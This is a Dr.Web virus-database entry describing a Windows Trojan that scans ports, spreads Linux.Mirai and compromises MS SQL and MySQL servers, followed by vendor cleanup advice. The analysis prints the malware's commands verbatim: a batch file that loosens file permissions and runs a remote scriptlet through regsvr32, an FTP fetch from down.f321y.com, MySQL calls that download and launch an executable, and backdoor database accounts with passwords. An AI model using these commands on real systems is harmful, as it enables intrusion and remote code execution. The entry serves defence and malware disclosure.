¡Protege lo creado!

Otros recursos

  • free.drweb-av.es — utilidades gratuitas, complementos, informadores
  • av-desk.com — un servicio en Internet para los proveedores de servicios Dr.Web AV-Desk
  • curenet.drweb.com — utilidad de desinfección de red Dr.Web CureNet!

Mi biblioteca
Mi biblioteca

+ Añadir a la biblioteca

Soporte 24 horas | Normas de contactar

Sus solicitudes



Added to the Dr.Web virus database: 2017-01-30

Virus description added:


  • 9575d5edb955e8e57d5886e1cf93f54f52912238
  • f97e8145e1e818f17779a8b136370c24da67a6a5
  • 42c9686dade9a7f346efa8fdbe5dbf6fa1a7028e
  • 938715263e1e24f3e3d82d72b4e1d2b60ab187b8

A Trojan for Microsoft Windows written in C++. Designed to scan TCP ports from the indicated range of IP addresses in order to execute various commands and distribute other malware.

When launched, the Trojan connects to its command and control server, downloads the configuration file (wpd.dat) and extracts the list of IP addresses. Then the scanner is launched: it refers to the listed addresses and simultaneously checks several ports. The Trojan can address the following ports:

 * 22
 * 23
 * 135
 * 445
 * 1433
 * 3306
 * 3389

Launch flags:

-syn - use scanning in Tcp_Syn mode instead of Tcp_connect mode
-log - log information in the log file
-see - display console window
-srv - launch as a server
-cli - launch as a client
-start, -stop, -create, -delete - service management
-run – launch the Trojan as an application, not as a service
-s - launch the Trojan a service

In case of successful connection to the remote node via any used protocol except RDP, the Trojan executes a set of commands indicated in the configuration file. While connecting to the Linux device via Telnet protocol, it downloads a binary file, and this file subsequently downloads and launches Linux.Mirai.

For connections with WMI, it launches processes with Win32_Process.Create method in the remote system. Using IPC, it can directly send IPC commands to the remote node.

Upon connection to the remote MS SQL server, it creates file С:\windows\system32\wbem\123.bat with the following content:

@echo off
mode con: cols=13 lines=1
cacls C:\\Progra~1\\Common~1\\System\\ado\\msado15.dll /e /g system:f&cacls C:\\windows\\system32\\cacls.exe /e /g system:f&cacls C:\\windows\\system32\\cmd.exe /e /g system:f&cacls C:\\windows\\system32\\ftp.exe /e /g system:f&cacls C:\\windows\\system32\\rundll32.exe /e /g everyone:f
taskkill /f /im regsvr32.exe&taskkill /f /im rundll32.exe
regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll&regsvr32 /s jscript.dll&regsvr32 /s vbscript.dll&regsvr32 /s scrrun.dll&regsvr32 /s WSHom.Ocx&regsvr32 /s shell32.dll
attrib +s +h *.bat
start regsvr32 /u /s /i:http://*****.com:280/v.sct scrobj.dll
if exist c:\\windows\\debug\\item.dat start rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa

Creates file PerfStringse.ini with the following content:

[File Security]
1=c:\\windows\\system32\\cmd.exe, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
1=c:\\windows\\system32\\ftp.exe, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
1=c:\\windows\\system32\\cacls.exe, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
1=C:\\Progra~1\\Common~1\\System\\ado\\msado15.dll, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
1=c:\\windows\\system32\\regsvr32.exe, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
1=c:\\windows\\system32\\icacls.exe, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
1=c:\\windows\\system32\\net1.exe, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)

Creates file c:\windows\systemmyusa.dvr with the following content:

open down.f321y.com
get 1.dat c:\\windows\\system\\myusago.dvr
get 1.bat c:\\windows\\system\\backs.bat

It also creates DBMS user with login Mssqla and password Bus3456#qwein, grants him sysadmin privileges. Acting under the name of this user and with the help of SQL server event service, various tasks are executed.

Upon connection to the remote MySQL server, it creates a user with the name MySQL and password phpgod, grants him the following privileges:


Creates dynamic library in the folder C:\Windows\System32\ and imports its functions. Executes the following MySQL commands:

SELECT downa("http://*****.com:280/mysql.exe","c:\\windows\\system32\\ser.exe");
SELECT cmda("C:\\windows\\system32\\ser.exe");

News about the Trojan

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android

Desarrollador ruso de antivirus Dr.Web
Experiencia de desarrollo a partir del año 1992
Dr.Web se usa en más de 200 países del mundo
Entrega de antivirus como servicio a partir del año 2007
Soporte 24 horas

Dr.Web © Doctor Web
2003 — 2021

Doctor Web es un productor ruso de los medios antivirus de protección de la información bajo la marca Dr.Web. Los productos Dr.Web se desarrollan a partir del año 1992.

125124, Rusia, Moscú, c/3 Yamskogo Polya, 2, edif.12А